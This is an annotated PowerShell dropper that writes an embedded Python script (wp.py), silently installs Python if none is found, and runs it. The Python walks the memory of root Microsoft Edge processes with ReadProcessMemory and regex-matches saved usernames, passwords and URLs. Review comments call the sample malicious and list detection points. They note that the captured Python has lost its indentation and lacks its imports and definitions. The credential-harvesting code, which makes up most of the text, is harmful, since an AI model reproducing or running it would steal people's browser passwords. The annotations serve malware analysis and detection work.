# ===== Embedded payload =====
# NOTE(review): the single-quoted (non-interpolating) here-string below is written
# verbatim to wp.py by Set-Content further down and then executed with whatever
# python3/python is on PATH. Its contents are a runtime string literal, so nothing
# inside it is altered here (the Japanese comments inside it read, in order:
# "skip the administrator-privilege check", "fix: initialise the address properly",
# "skip when the buffer cannot be created", "skip lines that are too short",
# "fix: move to the next memory region (after confirming BaseAddress and
# RegionSize are not None)").
#
# As captured, the Python has lost all indentation and refers to names that are
# not defined anywhere in this excerpt (psutil, ctypes, re, kernel32, the
# PROCESS_*/MEM_COMMIT/PAGE_READWRITE constants, MEMORY_BASIC_INFORMATION,
# ProcessInfo, get_process_owner_from_token), and main() is never invoked, so this
# is a partial capture of the sample rather than a complete program.
#
# What the embedded code does, read from its own statements:
#   - enumerates msedge.exe processes with psutil and keeps only those whose parent
#     is not itself msedge.exe (per its own comment, the root/browser process);
#   - opens each once per "<owner> <name>" pair with
#     PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, walks every committed
#     PAGE_READWRITE region with VirtualQueryEx / ReadProcessMemory;
#   - decodes each region as UTF-8 (falling back to latin-1), splits on line
#     breaks and regex-searches for "<scheme> <username> <password>" shaped
#     strings, printing "user : pass @url" tuples and a final match count.
# This is credential harvesting from browser process memory; treat the file as
# malicious. Detection points visible in the code: a python.exe child of
# powershell.exe opening msedge.exe handles with PROCESS_VM_READ and calling
# ReadProcessMemory repeatedly; a file named wp.py dropped into the working
# directory; the literal "NSC\t1_" prefix stripped from the owner name, which
# suggests the sample was tuned to one account-naming scheme (unconfirmed).
$pythonCode = @'
def main():
# 管理者権限チェックをスキップ
print("\033[92m[v]\033[0m Starting script execution\n")
print("Fetching browser processes:", end="", flush=True)
total_matches = 0
shown_matches = 0
seen_strings = set()
already_checked_users = set()
process_list = []
# Get all msedge.exe processes
for proc in psutil.process_iter(['pid', 'name', 'ppid']):
try:
if proc.info['name'] and proc.info['name'].lower() == 'msedge.exe':
pid = proc.info['pid']
parent_pid = proc.info['ppid']
skip = False
# Check what process is parent
try:
parent = psutil.Process(parent_pid)
if parent.name().lower() == 'msedge.exe':
skip = True # Parent is msedge.exe → skip this child process
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass # Parent may have exited → treat as root process
if skip:
continue
# The credentials are only stored at root/parent msedge.exe processes
owner = get_process_owner_from_token(pid)
process_list.append(ProcessInfo(pid, proc.info['name'], owner))
except (psutil.NoSuchProcess, psutil.AccessDenied):
continue
print(" Done.\n")
for proc in process_list:
user_process_key = f"{proc.Owner} {proc.Name}"
if user_process_key in already_checked_users:
continue
owner = proc.Owner.replace("NSC\\t1_", "")
print(f"Scanning process PID: {proc.Id}\tName: {proc.Name}\tOwner: {owner}")
process_handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, proc.Id)
if not process_handle:
print(f"Failed to open process: {proc.Id} {proc.Name} {proc.Owner}")
continue
# 修正: アドレスを適切に初期化
address = ctypes.c_void_p(0)
while True:
mem_info = MEMORY_BASIC_INFORMATION()
result = kernel32.VirtualQueryEx(
process_handle,
address,
ctypes.byref(mem_info),
ctypes.sizeof(MEMORY_BASIC_INFORMATION)
)
if result == 0:
break
readable = (mem_info.State == MEM_COMMIT and mem_info.Protect == PAGE_READWRITE)
if readable and mem_info.BaseAddress is not None:
region_size = mem_info.RegionSize
try:
buffer = ctypes.create_string_buffer(region_size)
except (OverflowError, MemoryError):
# バッファが作成できない場合はスキップ
address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize)
continue
bytes_read = ctypes.c_size_t(0)
if kernel32.ReadProcessMemory(
process_handle,
mem_info.BaseAddress,
buffer,
region_size,
ctypes.byref(bytes_read)
):
try:
utf8_data = buffer.raw[:bytes_read.value].decode('utf-8', errors='ignore')
except Exception:
try:
utf8_data = buffer.raw[:bytes_read.value].decode('latin-1', errors='ignore')
except Exception:
utf8_data = ""
if utf8_data:
lines = re.split(r'\r\n|\r|\n', utf8_data)
for line in lines:
if len(line) < 1: # 短すぎる行はスキップ
continue
pattern = r'[a-zA-Z]https?\x20([a-zA-ZæøåÆØÅ0-9\\\-_.@\?]{3,20})\x20([a-zA-ZæøåÆØÅ0-9#!@#\$%\^&\*\(\)_\-\+=\{\}\[\]:;<>\?/~\s]{6,40})\x20\x00'
try:
matches = re.finditer(pattern, line)
except Exception:
continue
for match in matches:
try:
username = match.group(1)
password = match.group(2)
potential_pattern = f"{username} : {password}"
url_pattern = (
r'\x00\x00\x00'
r'([A-Za-z0-9\-._~:/?#\[\]@!$&\'()*+,;=%]+)'
r'(https?)'
+ re.escape(f'\x20{username} {password}')
)
for url_match in re.finditer(url_pattern, line):
value = url_match.group(1)
combined = f"{potential_pattern} @{value}"
if combined not in seen_strings:
print(combined)
seen_strings.add(combined)
shown_matches += 1
total_matches += 1
already_checked_users.add(user_process_key)
except Exception:
continue
# 修正: 次のメモリリージョンへ移動(BaseAddressとRegionSizeがNoneでないことを確認)
if mem_info.BaseAddress is not None and mem_info.RegionSize is not None:
address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize)
else:
break
kernel32.CloseHandle(process_handle)
seen_strings.clear()
print(f"\nTotal matches found across all processes: {total_matches}. {shown_matches} shown.")
'@
# Drop the payload as wp.py in the current working directory (UTF-8, no BOM check).
$pyFile = "wp.py"
Set-Content -Path $pyFile -Value $pythonCode -Encoding UTF8
Write-Host "Saved: $pyFile"
# ===== Locate a Python interpreter (python3 preferred, then python) =====
$pythonCmd = $null
if (Get-Command python3 -ErrorAction SilentlyContinue) {
$pythonCmd = "python3"
}
elseif (Get-Command python -ErrorAction SilentlyContinue) {
$pythonCmd = "python"
}
# ===== If no interpreter is present, install one silently =====
# NOTE(review): fetches the official 3.12.3 amd64 installer over HTTPS into %TEMP%
# and runs it unattended, machine-wide (InstallAllUsers=1) and on PATH
# (PrependPath=1). There is no integrity check on the download (no Get-FileHash
# or signature verification) before it is executed. A silent, machine-wide
# installer launched from %TEMP% by a PowerShell process is itself a detection
# point; InstallAllUsers=1 requires elevation, so without it the install step
# fails and the script reaches the Write-Error/exit 1 branch below.
if (-not $pythonCmd) {
Write-Host "Python not found. Downloading..."
$installer = "$env:TEMP\python-installer.exe"
Invoke-WebRequest `
-Uri "https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe" `
-OutFile $installer
Write-Host "Installing Python..."
Start-Process `
-FilePath $installer `
-ArgumentList "/quiet InstallAllUsers=1 PrependPath=1" `
-Wait
# Reload PATH from the Machine and User scopes so the new install is visible in
# this session without restarting the shell.
$env:Path = [System.Environment]::GetEnvironmentVariable(
"Path",
"Machine"
) + ";" + [System.Environment]::GetEnvironmentVariable(
"Path",
"User"
)
# Re-check for an interpreter after the install.
if (Get-Command python3 -ErrorAction SilentlyContinue) {
$pythonCmd = "python3"
}
elseif (Get-Command python -ErrorAction SilentlyContinue) {
$pythonCmd = "python"
}
if (-not $pythonCmd) {
Write-Error "Python installation failed."
exit 1
}
}
# ===== Run the dropped payload =====
Write-Host "Running wp.py with $pythonCmd"
& $pythonCmd $pyFile |